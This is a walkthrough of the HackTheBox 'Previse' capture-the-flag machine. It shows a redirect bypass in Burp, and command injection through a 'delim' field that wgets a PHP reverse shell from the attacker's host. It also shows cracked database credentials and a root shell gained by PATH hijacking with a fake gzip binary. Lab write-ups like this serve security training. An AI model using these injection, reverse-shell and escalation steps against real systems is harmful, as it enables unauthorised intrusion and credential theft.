In this post, I would like to share a walkthrough of the Previse Machine from HackTheBox
This room has been considered difficulty rated as an Easy machine on HackThebox
What will you gain from Previse machine?
For user flag, you will get a file from the website and get a shell using burpsite
As for the root flag, you need to execute some Path Injection to get a root reverse shell
Information Gathering
Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s try to open the website
We have been redirected to a Previse File Storage login page where I cannot find any useful information to be used from here.
Let’s run gobuster to enumerate any interesting directory that has been using PHP file format.
The command to use here can be something such as
gobuster dir -u http://<machine’s ip> -w /usr/share/wordlists/dirb/common.txt -x php
We managed to get a few interesting files such as config.php on the gobuster result.
Oh, wait! We also managed to get status 403 and 302 on certain directories from the result.
For more information on those status codes, we need to do some research on the internet and managed to find the information over here
Next, we should be opening BurpSuite Tools to inspect the web packet.
Once we have Burpsuite started, we need to go to Proxy > Options where we need to add a match/replace rule. We need to redirect a 302 Found status code to replace it with a 200 OK status code
Let’s try to access the accounts.php directory with the support from BurpSuite
Gaining the Privileges Access
The website has been loading for a while now, so let’s see on the BurpSuite
On the intercept section, I notice that we have a website packet that needed to be forwarded to the website.
After we have forwarded the packet, we managed to get a page that requires the creation of a new account.
A new user was added to the system database where we should be able to see the Dashboard
From the screenshot above, we should try to roam within the website in case obtaining useful details
On the files section, there’s a file called SITEBACKUP.ZIP where we should be able to download the file into our machine.
We need to unzip the file where we can see a bunch of PHP files such as shown in the screenshot above. We should read all files, but one file has caught my eye such as config.php
There’s a configuration on MySQL connection but sadly, we cannot use the credentials right now. However, we should save the user and password from config.php which might be useful in the future.
The only problem that we faced right now is how can we get a reverse shell on the machine itself.
While looking within other files, we stumbled on an interesting file (logs.php) where we can see {$_POST[‘delim’]} function inside the file.
We also notice that there’s a log data section under the Management Menu column on the website
The page should look something like above where we should be getting a file after clicking the Submit button
When I opened the file, I notice there were a lot of lines within the file. We might find the username that can be logged into the machine
BurpSuite Intercept
Let’s analyze the flow by using BurpSuite where we should be able to notice that a Request body that shows delim=comma
We should modify the php-reverse-shell.php with my own IP and choose PORT
A few things that we should be running from our attacker’s machine such as the python server and netstat/nc
After those have been started, we should be able to get a reverse shell by using BurpSuite
On the BurpSuite request, we can add a separate command which retrieves our php-reverse-shell.php by using delim=comma|wget http://<ip>:<port>/php-reverse-shell.php
Sadly, we got a 302 Found on the Request Header which shouldn’t be happening to us.
How to solve these issues?
After a while, we should retry the website by logging back to the website
Aside from that, I have renamed the php-reverse-shell to shell.php just in case
Once we have fully modified it, we should try to get a reverse shell again.
It is looking surprisingly good so far and let’s continue to the next step.
Boom! We got a reverse shell on our attacker’s machine.
MySQL enumeration on previse machine
Let’s enumerate the database by using the credentials that we found earlier. Sadly, we got a MySQL syntax error from that command.
My bad! I have run the wrong command previously and I am just running the correct command right now. Surprisingly, it works like charm!
We also can read the username and password that have been stored inside MySQL (my username is there too)
For us to get the password, we need to crack the hash that we found in MySQL
For that purpose, we can use hashcat tool which it can provide you with the password
As a result, we have the credentials as shown below:
- username: m4lwhere
- password: ilovecody112235!
Maintaining Privileges Access on Previse Machine
We can access the machine via SSH service by using the credentials that we found previously.
We can read the user flag by executing the command “cat user.txt“
Escalate to Root Privileges Access on Previse machine
For us to get escalation to root, we need to find the SUID file that we can use to abuse.
By typing the command “sudo -l” and we managed to be aware of /opt/scripts/access_backup.sh
While reading the file access_backup.sh, we know that we can run some commands from anywhere inside the machine.
I have created a gzip file that contains a reverse shell command (bash command) under /dev/shm directory
We need to give permission to execute the gzip file
We should be exporting the PATH into the mentioned command above.
Next, we should be running the SUID file using sudo permission, but we need to start our listener before executing it.
Voila! We get a shell back to us as Root Access and we can read the root flag by using the command “cat /root/root.txt“
One response
Nice One